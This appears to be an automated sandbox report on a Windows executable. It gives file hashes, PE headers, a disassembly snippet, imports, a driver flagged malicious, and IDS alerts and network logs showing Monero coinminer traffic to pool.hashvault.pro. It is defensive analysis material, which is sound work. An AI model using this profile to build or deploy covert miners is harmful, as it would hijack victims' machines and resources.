                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\conhost.exe
                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):14544
                                                  Entropy (8bit):6.2660301556221185
                                                  Encrypted:false
                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                  Joe Sandbox View:
                                                  • Filename: Solara.exe, Detection: malicious, Browse
                                                  • Filename: launcher.exe.bin.exe, Detection: malicious, Browse
                                                  • Filename: nW2oopMIdg.exe, Detection: malicious, Browse
                                                  • Filename: gem2.exe, Detection: malicious, Browse
                                                  • Filename: chrtrome22.exe, Detection: malicious, Browse
                                                  • Filename: pTVKHqys2h.exe, Detection: malicious, Browse
                                                  • Filename: 174.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: 47SXvEQ.exe, Detection: malicious, Browse
                                                  • Filename: xmr new.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                  File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                  Entropy (8bit):7.999991889029266
                                                  TrID:
                                                  • Win64 Executable (generic) (12005/4) 74.95%
                                                  • Generic Win/DOS Executable (2004/3) 12.51%
                                                  • DOS Executable Generic (2002/1) 12.50%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                  File name:9d2h99wrj.exe
                                                  File size:31'161'344 bytes
                                                  MD5:88848246ce109235a762fcd193210caa
                                                  SHA1:9bbe1f1ef018b4cf4f9b4df15bd0904ab4f2ff5e
                                                  SHA256:ae9bec259aef6380ed576361d588180e1850742708c24e60dc92fe07d0fb90c9
                                                  SHA512:3a4f5a41631b40bed2224cb4bdffaebd83cf40a8afa775623ecfa019928a1dfcdc749b4dc050dc6dfb54798add3e3d65424383cb37f422df5f79b492891cd999
                                                  SSDEEP:786432:YWC/VCO2W2JqrlTY25R6DTrqBDfIRwwoSPDitdV2jFj3qW3yq:BaVCO12YM25RyeTIRuN2R5i
                                                  TLSH:FF6733D123DD1175EF4671681E9B8DD6B4BE296CE89AE1C0BFD2131B260DE0E8504EBC
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........b......."........@......................................,.....................................
                                                  Icon Hash:90cececece8e8eb0
                                                  Entrypoint:0x4022fa
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                  DLL Characteristics:
                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:02549ff92b49cce693542fc9afb10102
                                                  Instruction
                                                  push ebp
                                                  dec eax
                                                  mov ebp, esp
                                                  dec eax
                                                  sub esp, 00000040h
                                                  dec eax
                                                  mov eax, 00000004h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  dec ecx
                                                  mov eax, eax
                                                  mov eax, 00000000h
                                                  dec ecx
                                                  mov ebx, eax
                                                  dec eax
                                                  lea eax, dword ptr [ebp-04h]
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  dec esp
                                                  mov edx, ebx
                                                  call 00007F85D8BCBF21h
                                                  dec eax
                                                  lea eax, dword ptr [FFFFFF98h]
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  call 00007F85D8BCBF3Fh
                                                  mov eax, 00000001h
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  call 00007F85D8BCBF37h
                                                  mov eax, 00030000h
                                                  dec ecx
                                                  mov ebx, eax
                                                  mov eax, 00010000h
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  dec esp
                                                  mov edx, ebx
                                                  call 00007F85D8BCBF24h
                                                  dec eax
                                                  mov eax, dword ptr [01DB6824h]
                                                  dec eax
                                                  mov ecx, dword ptr [01DB6825h]
                                                  dec eax
                                                  mov edx, dword ptr [01DB6826h]
                                                  dec eax
                                                  mov dword ptr [ebp-10h], eax
                                                  dec eax
                                                  lea eax, dword ptr [ebp-04h]
                                                  dec eax
                                                  mov dword ptr [esp+20h], eax
                                                  mov eax, dword ptr [01DB7C17h]
                                                  dec ecx
                                                  mov ecx, eax
                                                  dec ecx
                                                  mov eax, edx
                                                  dec ecx
                                                  mov ebx, ecx
                                                  dec eax
                                                  mov eax, dword ptr [ebp-10h]
                                                  dec ecx
                                                  mov edx, eax
                                                  dec esp
                                                  mov ecx, edx
                                                  dec esp
                                                  mov edx, ebx
                                                  call 00007F85D8BCBEE9h
                                                  dec eax
                                                  mov eax, dword ptr [01DB67E1h]
                                                  dec eax
                                                  mov ecx, dword ptr [01DB67E2h]
                                                  dec eax
                                                  mov edx, dword ptr [01DB67E3h]
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1db8b300x3c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1dbb0000x1f0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1dba0000x90.pdata
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1db8b6c0x90.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x14e00x160013853b963b201ea16f713421eaf302fbFalse0.3283025568181818data5.435530746793809IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x30000x1db5d6e0x1db5e005c5669048d44bdd74b60c56a40f08300unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .bss0x1db90000xfac0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .pdata0x1dba0000x900x200833d670d56c423f97067d7571a397b78False0.17578125data1.2087156271204966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .rsrc0x1dbb0000x1f00x200042f8dc0c5470b0dce68fda4d1872eb1False0.53125data4.831618991015907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_MANIFEST0x1dbb0580x198XML 1.0 document, Unicode text, UTF-8 (with BOM) textEnglishUnited States0.553921568627451
                                                  DLLImport
                                                  msvcrt.dllmalloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                  kernel32.dllSleep, CreateProcessA, SetUnhandledExceptionFilter
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Download Network PCAP: filteredfull

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-01-12T14:19:06.623850+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.44973080.240.16.67443TCP
                                                  2025-01-12T14:19:08.414148+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4576991.1.1.153UDP
                                                  2025-01-12T14:20:10.875041+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4516651.1.1.153UDP
                                                  • Total Packets: 32
                                                  • 443 (HTTPS)
                                                  • 53 (DNS)
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 12, 2025 14:19:08.425515890 CET49730443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:08.425563097 CET4434973080.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:08.425632000 CET49730443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:08.425708055 CET49730443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:08.425715923 CET4434973080.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:08.426218033 CET4434973080.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:14.421180964 CET49731443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:19:14.421278000 CET44349731192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:19:14.421372890 CET49731443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:19:14.421504021 CET49731443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:19:14.421535015 CET44349731192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:19:14.421670914 CET44349731192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:19:19.452370882 CET49733443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:19.452404976 CET4434973380.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:19.452486992 CET49733443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:19.452625990 CET49733443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:19.452634096 CET4434973380.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:19.452780962 CET4434973380.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:24.483525038 CET49739443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:24.483618021 CET4434973980.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:24.483721972 CET49739443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:24.497188091 CET49739443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:24.497225046 CET4434973980.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:24.497502089 CET4434973980.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:29.530535936 CET49740443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:29.530587912 CET4434974080.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:29.530689001 CET49740443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:29.530853987 CET49740443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:29.530868053 CET4434974080.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:29.531131983 CET4434974080.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:34.608056068 CET49741443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:19:34.608150959 CET44349741192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:19:34.608226061 CET49741443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:19:34.608597994 CET49741443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:19:34.608624935 CET44349741192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:19:34.608745098 CET44349741192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:19:39.649596930 CET49742443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:39.649688005 CET4434974280.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:39.649766922 CET49742443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:39.649863005 CET49742443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:39.649880886 CET4434974280.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:39.650091887 CET4434974280.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:44.686709881 CET49743443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:44.686795950 CET4434974380.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:44.686907053 CET49743443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:44.687077045 CET49743443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:44.687117100 CET4434974380.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:44.687258959 CET4434974380.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:49.733779907 CET49744443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:49.733875990 CET4434974480.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:49.734076977 CET49744443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:49.734226942 CET49744443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:19:49.734251976 CET4434974480.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:49.734417915 CET4434974480.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:19:54.776551962 CET49745443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:19:54.776587009 CET44349745192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:19:54.776658058 CET49745443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:19:54.789866924 CET49745443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:19:54.789881945 CET44349745192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:19:54.790009022 CET44349745192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:00.796072960 CET49753443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:00.796161890 CET44349753192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:00.796621084 CET49753443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:00.805141926 CET49753443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:00.805181980 CET44349753192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:00.805242062 CET44349753192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:05.842875957 CET49787443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:20:05.842959881 CET4434978780.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:20:05.843055010 CET49787443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:20:05.843153000 CET49787443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:20:05.843173981 CET4434978780.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:20:05.843357086 CET4434978780.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:20:10.883552074 CET49819443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:10.883565903 CET44349819192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:10.883616924 CET49819443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:10.883702993 CET49819443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:10.883708954 CET44349819192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:10.883858919 CET44349819192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:15.905391932 CET49853443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:15.905452967 CET44349853192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:15.905528069 CET49853443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:15.914099932 CET49853443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:15.914133072 CET44349853192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:15.914235115 CET44349853192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:20.921058893 CET49885443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:20.921148062 CET44349885192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:20.921235085 CET49885443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:20.921322107 CET49885443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:20.921344042 CET44349885192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:20.921503067 CET44349885192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:25.969124079 CET49918443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:25.969217062 CET44349918192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:25.969294071 CET49918443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:25.972429991 CET49918443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:25.972466946 CET44349918192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:25.972748995 CET44349918192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:30.999187946 CET49946443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:30.999248981 CET44349946192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:30.999350071 CET49946443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:31.009056091 CET49946443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:31.009074926 CET44349946192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:31.009161949 CET44349946192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:36.061723948 CET49977443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:36.061747074 CET44349977192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:36.061810017 CET49977443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:36.061894894 CET49977443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:36.061903000 CET44349977192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:36.061999083 CET44349977192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:41.094238997 CET50011443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:41.094253063 CET44350011192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:41.094316006 CET50011443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:41.094440937 CET50011443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:41.094449997 CET44350011192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:41.094543934 CET44350011192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:46.155685902 CET50023443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:46.155786037 CET44350023192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:46.155878067 CET50023443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:46.164726019 CET50023443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:46.164767981 CET44350023192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:46.164819956 CET44350023192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:51.186750889 CET50024443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:51.186805010 CET44350024192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:51.186876059 CET50024443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:51.186965942 CET50024443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:20:51.186976910 CET44350024192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:51.187099934 CET44350024192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:20:56.218153954 CET50025443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:20:56.218225002 CET4435002580.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:20:56.218312979 CET50025443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:20:56.218415976 CET50025443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:20:56.218434095 CET4435002580.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:20:56.218573093 CET4435002580.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:21:01.264909983 CET50026443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:21:01.264995098 CET4435002680.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:21:01.265084982 CET50026443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:21:01.273346901 CET50026443192.168.2.480.240.16.67
                                                  Jan 12, 2025 14:21:01.273377895 CET4435002680.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:21:01.273428917 CET4435002680.240.16.67192.168.2.4
                                                  Jan 12, 2025 14:21:06.312091112 CET50027443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:21:06.312122107 CET44350027192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:21:06.312194109 CET50027443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:21:06.312285900 CET50027443192.168.2.4192.248.189.11
                                                  Jan 12, 2025 14:21:06.312292099 CET44350027192.248.189.11192.168.2.4
                                                  Jan 12, 2025 14:21:06.312411070 CET44350027192.248.189.11192.168.2.4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 12, 2025 14:19:08.414148092 CET5769953192.168.2.41.1.1.1
                                                  Jan 12, 2025 14:19:08.421493053 CET53576991.1.1.1192.168.2.4
                                                  Jan 12, 2025 14:20:10.875041008 CET5166553192.168.2.41.1.1.1
                                                  Jan 12, 2025 14:20:10.882807016 CET53516651.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 12, 2025 14:19:08.414148092 CET192.168.2.41.1.1.10x48b9Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                  Jan 12, 2025 14:20:10.875041008 CET192.168.2.41.1.1.10x10c1Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 12, 2025 14:19:08.421493053 CET1.1.1.1192.168.2.40x48b9No error (0)pool.hashvault.pro192.248.189.11A (IP address)IN (0x0001)false
                                                  Jan 12, 2025 14:19:08.421493053 CET1.1.1.1192.168.2.40x48b9No error (0)pool.hashvault.pro80.240.16.67A (IP address)IN (0x0001)false
